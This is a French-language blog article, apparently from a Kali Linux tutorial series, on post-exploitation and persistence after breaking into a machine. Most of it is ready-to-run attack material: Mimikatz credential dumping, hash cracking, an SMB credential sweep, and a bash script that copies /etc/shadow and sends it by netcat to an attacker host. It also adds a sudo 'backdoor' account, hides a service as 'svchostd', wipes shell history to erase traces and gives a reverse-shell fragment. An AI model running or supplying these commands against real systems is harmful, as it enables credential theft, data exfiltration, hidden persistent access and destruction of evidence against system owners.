🛡️ Article 4 — Kali Post-Exploitation & Persistance : l’art du squat numérique

“Ok, t’es dedans. Et maintenant, tu fais quoi ?” — Tous les formateurs en cybersécurité, un jour.

Tu as ouvert une porte. Une faille a parlé. Un shell a répondu. Bravo, tu es passé en mode “admin fantôme”.
Maintenant commence la vraie partie : explorer, extraire, pivoter… et parfois, rester planqué.


🧾 Objectifs de la post-exploitation

  1. Maintenir un accès stable et discret.
  2. Élever ses privilèges.
  3. Explorer les ressources.
  4. Extraire les informations sensibles.
  5. Préparer un pivot vers d’autres systèmes.

En gros ? Tu deviens un espion numérique en mission. Le James Bond du shell prompté.


🧰 Les outils stars de la post-exploitation sur Kali

🧠 1. Mimikatz (Windows only, sorry penguin lovers)

Permet d’extraire des mots de passe, tickets Kerberos, hash NTLM, et bien plus.

powershell
privilege::debug
sekurlsa::logonpasswords

À lancer en tant qu’administrateur, sinon c’est “access denied”.

🧠 2. BloodHound (+ neo4j)

Visualisation des relations Active Directory et élévation de privilèges via graphe.

  • SharpHound.exe côté victime pour collecter les infos.
  • Visualisation via BloodHound GUI côté Kali.
bash
bloodhound

🧠 3. Empire / Powershell-Empire

Framework d’attaque post-exploitation 100% PowerShell.

Parfait pour une persistance Windows discrète avec communication chiffrée.

🧠 4. John The Ripper

Crack de hash offline. Tu as dumpé des hashs ? Tu veux les casser ? Go John.

bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

🧠 5. CrackMapExec

Swiss army knife AD : exécution distante, enumeration SMB, dump, etc.

bash
crackmapexec smb 192.168.1.0/24 -u admin -p 'motdepasse'

🧩 Script de récupération + exfiltration discrète

Un petit script pour faire propre et furtif :

bash
#!/bin/bash

TARGET_DIR="/tmp/dump"
mkdir -p $TARGET_DIR

echo "[+] Dump des infos système..."
hostname > $TARGET_DIR/hostname.txt
whoami > $TARGET_DIR/user.txt
ifconfig > $TARGET_DIR/ip.txt

echo "[+] Dump des mots de passe (hashés)..."
cat /etc/shadow > $TARGET_DIR/shadow_dump.txt 2>/dev/null

echo "[+] Création de l’archive..."
tar czf dump.tar.gz $TARGET_DIR

echo "[+] Envoi via netcat..."
cat dump.tar.gz | nc attacker-ip 4444

Côté Kali, il suffit d’écouter :

bash
nc -lvnp 4444 > dump_received.tar.gz

🔗 Persistance : quelques astuces de squat

  • Ajout d’un nouvel utilisateur avec sudo :
bash
sudo useradd -m backdoor -s /bin/bash
sudo passwd backdoor
sudo usermod -aG sudo backdoor
  • Ajout de clé SSH dans ~/.ssh/authorized_keys
  • Planification via cron (ou schtasks sur Windows)
  • Service déguisé sous un nom système (svchostd est un grand classique)

🧼 Nettoyage (optionnel, mais classe)

Un vrai pentester laisse parfois des traces volontaires, pour l’analyse. Mais si tu veux rester discret :

bash
history -c && history -w
rm -rf ~/.bash_history

Et surtout, utilise des shells non interactifs (bash -i >& /dev/tcp/…) pour ne rien logguer du tout.


🧯 En résumé

La post-exploitation est une phase critique : c’est là que tu transformes un accès en prise de contrôle.
Tu ne te contentes pas de rentrer — tu explores, tu prépares l’étape d’après, et tu t’assures qu’on t’oublie pas trop vite.


Prochain arrêt : Nettoyage, OPSEC et sécurité de l’attaquant. Parce que Kali, c’est bien… sauf si toi aussi tu te fais pwned.

🛡️ Article 4 — Kali Post-Exploitation & Persistance : l’art du squat numérique
Partager cet article : Twitter LinkedIn WhatsApp

🖋️ Publié sur SecuSlice.com

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Retour en haut